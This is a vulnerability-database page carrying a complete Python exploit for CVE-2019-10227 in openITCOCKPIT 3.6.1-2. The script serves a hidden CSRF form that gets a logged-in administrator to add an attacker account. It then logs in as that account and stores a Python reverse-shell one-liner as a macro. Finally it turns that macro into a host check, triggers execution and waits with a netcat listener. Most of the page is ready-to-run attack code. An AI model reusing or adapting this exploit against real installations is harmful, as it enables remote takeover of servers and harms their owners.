Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJulian RittwegerPACKETSTORM:154212
HistoryAug 26, 2019 - 12:00 a.m.

openITCOCKPIT 3.6.1-2 Cross Site Request Forgery

2019-08-2600:00:00
Julian Rittweger
packetstormsecurity.com
159

0.001 Low

EPSS

Percentile

45.9%

JSON
`# Exploit Title: openITCOCKPIT 3.6.1-2 - CSRF 2 RCE  
# Google Dork: N/A  
# Date: 26-08-2019  
# Exploit Author: Julian Rittweger  
# Vendor Homepage: https://openitcockpit.io/  
# Software Link: https://github.com/it-novum/openITCOCKPIT/releases/tag/openITCOCKPIT-3.6.1-2  
# Fixed in: 3.7.1 | https://github.com/it-novum/openITCOCKPIT/releases  
# Version: 3.6.1-2  
# Tested on: Debian 9  
# CVE : 2019-10227  
# Exploit Requirements: pip3 install bs4 requests && apt install netcat  
  
#!/usr/bin/env python  
import requests, urllib3, os  
import http.server, socketserver  
  
from bs4 import BeautifulSoup as bs  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
print("""  
--   
openITCOCKPIT v.3.6.1-2  
[CSRF 2 RCE]  
--  
""")  
  
# Setup values  
RHOST = input('[x] Enter IP of remote machine: ')  
LHOST = input('[x] Enter IP of local machine: ')  
RPORT = int(input('[x] Enter local port (back-connection): '))  
LPORT = int(input('[x] Enter local port (payload-hosting): '))  
  
print('[-] Generating CSRF form using the following credentials: "[email protected] - letmein1337" ..')  
  
# Generate file which serves CSRF payload  
pl = open('./index.html', 'w')  
# Register HTTP server  
handler = http.server.SimpleHTTPRequestHandler  
  
csrf = """  
<iframe style="display:none;" name="csrff"></iframe>  
<form method="post" action="https://""" + RHOST + """/users/add" target="csrff" style="display:none;">  
<input type="text" name="_method" value="POST">  
<input type="text" name="data[User][Container][]" value="1">  
<input type="text" name="data[ContainerUserMembership][1]" value="2">  
<input type="text" name="data[User][usergroup_id]" value="1">  
<input type="text" name="data[User][status]" value="1">  
<input type="text" name="data[User][email]" value="[email protected]">  
<input type="text" name="data[User][firstname]" value="Mr">  
<input type="text" name="data[User][lastname]" value="Nice">  
<input type="text" name="data[User][new_password]" value="letmein1337">  
<input type="text" name="data[User][confirm_new_password]" value="letmein1337">  
<input type="submit">  
</form>  
<script>  
function Redirect() {   
window.location="https://""" + RHOST + """/login/logout";   
}   
  
document.forms[0].submit();  
setTimeout('Redirect()', 3000);   
</script>  
"""  
  
pl.write(csrf)  
pl.close()  
httpd = socketserver.TCPServer(("", LPORT), handler)  
  
# Start HTTP server, quit on keyboard interrupt  
try:  
print('[!] Serving payload at port : ' + str(LPORT) + ', press STRG+C if you registered requests!')  
print('[!] Send this URL to a logged-in administrator: http://' + LHOST + ':' + str(LPORT))  
httpd.serve_forever()  
except KeyboardInterrupt:  
httpd.socket.close()  
print('\n[-] Starting exploitation ..')  
  
print('[-] Logging in ..')  
# Proceed login with generated credentials  
c = requests.post('https://' + RHOST + '/login/login', data={'_method' : 'POST', 'data[LoginUser][username]' : '[email protected]', 'data[LoginUser][password]' : 'letmein1337'}, verify=False, allow_redirects=False).headers['Set-Cookie']  
print('[!] Received cookie: ' + c.split(';')[0])  
print('[-] Creating reverse-shell as macro ..')  
# Insert a new macro identified as $USER99$   
makro = {'_method' : 'POST', 'data[0][Macro][id]' : 1, 'data[0][Macro][name]' : '$USER1$', 'data[0][Macro][value]' : '/opt/openitc/nagios/libexec', 'data[0][Macro][description]' : 'default', 'data[0][Macro][password]' : 0, 'data[1][Macro][id]' : 2, 'data[1][Macro][name]' : '$USER99$', 'data[1][Macro][value]' : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(RPORT) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", 'data[1][Macro][password]' : 1}  
requests.post('https://' + RHOST + '/macros', data=makro, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})  
print('[-] Inserting macro as command ..')  
# Register a new command using the inserted macro  
requests.post('https://' + RHOST + '/commands/add/_controller:commands/_action:hostchecks', data={'_method' : 'POST', 'data[Command][command_type]' : 2, 'data[Command][name]' : 'pwned', 'data[Command][command_line]' : '$USER99$'}, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})  
h = bs(requests.get('https://' + RHOST + '/commands/hostchecks', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}).text, 'html.parser')  
ids = []  
  
# Fetch current commands by ID  
for i in h.find_all('form', {'action': lambda x : x.startswith('/commands/delete')}):  
ids.append(i.get('action').split('/')[-1])  
  
print('[!] ID of command identified as: ' + str(ids[-1]))  
print('[-] Updating default host ..')  
  
# Update host, using the new malicious "hostcheck" command  
sett = {'_method':'POST','data[Host][id]':'1','data[Host][container_id]':'1','data[Host][shared_container]':'','data[Host][hosttemplate_id]':'1','data[Host][name]':'localhost','data[Host][description]':'default+host','data[Host][address]':'127.0.0.1','data[Host][Hostgroup]':'','data[Host][Parenthost]':'','data[Host][notes]':'','data[Host][host_url]':'','data[Host][priority]':'1','data[Host][tags]':'','data[Host][notify_period_id]':'1','data[Host][notification_interval]':'0','data[Host][notification_interval]':'0','data[Host][notify_on_recovery]':'0','data[Host][notify_on_recovery]':'1','data[Host][notify_on_down]':'0','data[Host][notify_on_unreachable]':'0','data[Host][notify_on_unreachable]':'1','data[Host][notify_on_flapping]':'0','data[Host][notify_on_downtime]':'0','data[Host][active_checks_enabled]':'0','data[Host][active_checks_enabled]':'1','data[Host][Contact]':'','data[Host][Contact][]':'1','data[Host][Contactgroup]':'','data[Host][command_id]':ids[-1],'data[Host][check_period_id]':'1','data[Host][max_check_attempts]':'3','data[Host][check_interval]':'120','data[Host][check_interval]':'120','data[Host][retry_interval]':'120','data[Host][retry_interval]':'120','data[Host][flap_detection_enabled]':'0','data[Host][flap_detection_on_up]':'0','data[Host][flap_detection_on_down]':'0', 'data[Host][flap_detection_on_unreachable]' : 0}  
requests.post('https://' + RHOST + '/hosts/edit/1/_controller:hosts/_action:browser/_id:1/', data=sett, verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]})  
  
# Refresh host configuration  
print('[-] Refreshing host configuration ..')  
requests.get('https://' + RHOST + '/exports/launchExport/0.json', verify=False, cookies={'itnovum' : c.split(';')[0].split('=')[1]}, headers={'X-Requested-With' : 'XMLHttpRequest'})  
  
print('[!] Done! Enjoy your shell (popup in approx. 30s): ')  
  
# We did it!  
os.system('nc -lvp ' + str(RPORT))  
`

Related

prion 1
zdt 1
cve 1
cvelist 1
nvd 1
osv 1
prion
prion
Cross site scripting
2019-12-31 18:15:00
zdt
zdt
openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery Exploit
2019-08-26 00:00:00
cve
cve
CVE-2019-10227
2019-12-31 18:15:11
cvelist
cvelist
CVE-2019-10227
2019-12-31 17:44:02
nvd
nvd
CVE-2019-10227
2019-12-31 18:15:11
osv
osv
CVE-2019-10227
2019-12-31 18:15:11

0.001 Low

EPSS

Percentile

45.9%

JSON
Related for PACKETSTORM:154212
prion1zdt1cve1cvelist1nvd1osv1